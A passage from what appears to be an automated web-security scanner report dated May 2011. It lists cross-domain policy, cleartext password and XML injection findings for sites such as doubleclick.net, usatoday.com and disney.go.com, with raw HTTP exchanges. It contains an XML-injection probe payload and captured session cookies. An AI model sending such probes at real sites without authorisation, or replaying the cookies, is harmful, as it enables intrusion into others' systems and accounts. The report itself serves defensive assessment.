<allow-access-from domain="ad.uk.doubleclick.net"/>
<allow-access-from domain="st.sand.msn-int.com" secure="true"/>
<allow-access-from domain="*.msn.com" secure="true"/>
<allow-access-from domain="services.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.videoegg.com"/>
<allow-access-from domain="*.bebo.com"/>
<allow-access-from domain="*.hi5.com"/>
<allow-access-from domain="*.wayn.com"/>
<allow-access-from domain="*.tagged.com"/>
<allow-access-from domain="*.ringo.com"/>
<allow-access-from domain="dailytelegraph.accuweather.com"/>
<allow-access-from domain="skin.issuu.com" />
<allow-access-from domain="static.issuu.com" />
<allow-access-from domain="bestbuys.tmg.s3.amazonaws.com" />
<allow-access-from domain="*.washingtonpost.com" />
...[SNIP]...

6.86. http://www.orbitz.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 17:00:39 GMT
ETag: "2b8-4a30303185bc0"
Content-Type: text/xml
Content-Length: 696
Server: Apache
Date: Mon, 16 May 2011 01:29:50 GMT
Age: 13611
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

<cross-domain-policy>
   <allow-access-from domain="media.pointroll.com"/>
   <allow-access-from domain="www.pointroll.com"/>
   <allow-access-from domain="submit.pointroll.com"/>
   <allow-access-from domain="data.pointroll.com"/>
   <allow-access-from domain="speed.pointroll.com"/>
   <allow-access-from domain="mirror.pointroll.com"/>
   <allow-access-from domain="mx.pointroll.com"/>
   <allow-access-from domain="geo.pointroll.com"/>
   <allow-access-from domain="ll.pointroll.com"/>
   <allow-access-from domain="clk.pointroll.com"/>
   <allow-access-from domain="clients.pointroll.com"/>
   <allow-access-from domain="fdaf.pointroll.com"/>
   <allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...

7. Silverlight cross-domain policy previous next
There are 14 instances of this issue:

http://ad-emea.doubleclick.net/clientaccesspolicy.xml
http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://content.usatoday.com/clientaccesspolicy.xml
http://contextweb.usatoday.net/clientaccesspolicy.xml
http://i.usatoday.net/clientaccesspolicy.xml
http://metrics.fingerhut.com/clientaccesspolicy.xml
http://metrics.mcafee.com/clientaccesspolicy.xml
http://metrics.sonystyle.com/clientaccesspolicy.xml
http://metrics.us.playstation.com/clientaccesspolicy.xml
http://pixel.33across.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://usatoday1.112.2o7.net/clientaccesspolicy.xml
http://w88.go.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Mon, 16 May 2011 01:19:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sun, 15 May 2011 21:21:44 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 21:31:00 GMT
Date: Sun, 15 May 2011 21:31:00 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://content.usatoday.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

7.5. http://contextweb.usatoday.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contextweb.usatoday.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 16 May 2011 01:19:45 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

7.6. http://i.usatoday.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 16 May 2011 01:19:46 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

7.7. http://metrics.fingerhut.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.fingerhut.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.fingerhut.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:35 GMT
Server: Omniture DC/2.0.0
xserver: www32
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.8. http://metrics.mcafee.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.mcafee.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:52 GMT
Server: Omniture DC/2.0.0
xserver: www49
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://metrics.sonystyle.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sonystyle.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sonystyle.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:00 GMT
Server: Omniture DC/2.0.0
xserver: www424
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://metrics.us.playstation.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.us.playstation.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.us.playstation.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:45 GMT
Server: Omniture DC/2.0.0
xserver: www358
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.11. http://pixel.33across.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 335
Date: Mon, 16 May 2011 01:29:35 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

7.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:30:58 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 22 May 2011 21:30:58 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.13. http://usatoday1.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:53 GMT
Server: Omniture DC/2.0.0
xserver: www10
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.14. http://w88.go.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://w88.go.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:27:17 GMT
Server: Omniture DC/2.0.0
xserver: www381
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. Cleartext submission of password previous next
There are 6 instances of this issue:

http://disneycruise.disney.go.com/reservations/customize
http://localhost:50386/hoyt/Sitefinity/Startup
http://shoprunner.force.com/content/JsContentElementsGNC
http://shoprunner.force.com/content/JsContentElementsPET
http://www.passporterboards.com/forums/
http://www.viddler.com/file/7d63c65a/html5mobile/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://disneycruise.disney.go.com/login/

The form contains the following password field:

gspw

Request

GET /reservations/customize?execution=e1s3 HTTP/1.1
Host: disneycruise.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=854018943B22589E687DB21B47A5F07A; gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]; JSESSIONID=0E212034A9BDCC5CC21CFE7E312BCE40; dcl_content_persistence_cookie=4248946186.46205.0000; mbox=check#true#1305508896|session#1305508812278-378400#1305510696; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_wdpro_lid%3D%3B; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305511130529%3B; dcl_reservations_persistence_cookie=208848394.40065.0000; dcl_i_persistence=5Fmk/068WrWs5HNb0W5d6AFb7O28fwIGycSOGfvikKm0u+tuM2+OBMWAN19nTTq9KUc=; DCL_POOL=1

Response

8.2. http://localhost:50386/hoyt/Sitefinity/Startup previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://localhost:50386
Path:	/hoyt/Sitefinity/Startup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://localhost:50386/hoyt/Sitefinity/Startup

The form contains the following password fields:

wizard$ctl00$ctl04$SqlPassword
wizard$ctl00$ctl04$AzurePassword
wizard$ctl00$ctl04$OraPassword
wizard$ctl00$ctl04$MySQLPassword

Request

GET /hoyt/Sitefinity/Startup HTTP/1.1
Host: localhost:50386
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Cassini/4.1.1395.0
Date: Mon, 16 May 2011 00:10:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15543
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><meta ht
...[SNIP]...
<body onload="HideLoading()" onbeforeunload="ShowLoading()">
<form method="post" action="Startup" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'wizard_ctl00_ctl10_StepNextButton')" id="form1">
<div class="aspNetHidden">
...[SNIP]...
</label><input name="wizard$ctl00$ctl04$SqlPassword" type="password" id="wizard_ctl00_ctl04_SqlPassword" class="sfTxt" /></li>
...[SNIP]...
</label><input name="wizard$ctl00$ctl04$AzurePassword" type="password" id="wizard_ctl00_ctl04_AzurePassword" class="sfTxt" /></li>
...[SNIP]...
</label><input name="wizard$ctl00$ctl04$OraPassword" type="password" id="wizard_ctl00_ctl04_OraPassword" class="sfTxt" /></li>
...[SNIP]...
</label><input name="wizard$ctl00$ctl04$MySQLPassword" type="password" id="wizard_ctl00_ctl04_MySQLPassword" class="sfTxt" /></li>
...[SNIP]...

8.3. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 01:05:43 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 108383
Cache-Control: public, max-age=19338
Expires: Mon, 16 May 2011 07:05:34 GMT
Date: Mon, 16 May 2011 01:43:16 GMT
Connection: close

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.4. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 01:05:40 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 106125
Cache-Control: public, max-age=19577
Expires: Mon, 16 May 2011 07:05:43 GMT
Date: Mon, 16 May 2011 01:39:26 GMT
Connection: close

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.5. http://www.passporterboards.com/forums/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.passporterboards.com
Path:	/forums/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.passporterboards.com/forums/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /forums/ HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Set-Cookie: bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards.com
Set-Cookie: bblastactivity=0; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards.com
Cache-Control: private
Pragma: private
Content-Type: text/html; charset=ISO-8859-1
X-UA-Compatible: IE=7
Set-Cookie: vbseo_loggedin=deleted; expires=Sun, 16-May-2010 01:31:55 GMT; path=/
Content-Length: 162646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html dir="ltr" lang="en"> <head> <meta http-equiv="Pragma" content="no-cache
...[SNIP]...
<td class="alt2" nowrap="nowrap" style="padding:0px"> <form action="http://www.passporterboards.com/forums/login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)"> <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.6. http://www.viddler.com/file/7d63c65a/html5mobile/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.viddler.com
Path:	/file/7d63c65a/html5mobile/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.viddler.com/j_security_check

The form contains the following password field:

j_password

Request

GET /file/7d63c65a/html5mobile/ HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Range: bytes=0-

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/0.6.32
Date: Sun, 15 May 2011 20:26:39 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-Viddler-Node: viddler_d
Vary: Accept-Encoding
Content-Length: 7614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...
</a>

<form action="/j_security_check" method="post" id="login" style="display: none;">
<input type="text" name="j_username" id="login-username" size="10" class="dim"/>
...[SNIP]...
<input type="text" class="dim" value="password" id="login-password-show"/><input type="password" name="j_password" id="login-password" size="10" style="display: none;"/>
<a id="headerLoginSubmit" class="headerButton" href="#">
...[SNIP]...

9. XML injection previous next
There are 13 instances of this issue:

http://api.ak.facebook.com/restserver.php [format parameter]
http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 1]
http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 2]
http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 3]
http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 1]
http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 2]
http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 3]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]
http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

9.1. http://api.ak.facebook.com/restserver.php [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://api.ak.facebook.com
Path:	/restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&format=json]]>>&urls=http%3A%2F%2Fwww.magicalkingdoms.com%2Fblog%2F2011%2F05%2F09%2Fthe-dream-differences-on-disney-cruise-line%2F&callback=jsonp1305508793343 HTTP/1.1
Host: api.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=utf-8
Pragma:
X-FB-Rev: 378427
X-FB-Server: 10.42.13.57
X-Cnection: close
Content-Length: 850
Cache-Control: public, max-age=120
Expires: Mon, 16 May 2011 01:27:28 GMT
Date: Mon, 16 May 2011 01:25:28 GMT
Connection: close

jsonp1305508793343('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

9.2. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://d1nh2vjpqpfnin.cloudfront.net
Path:	/main/prod/utag.7001.js

Issue detail

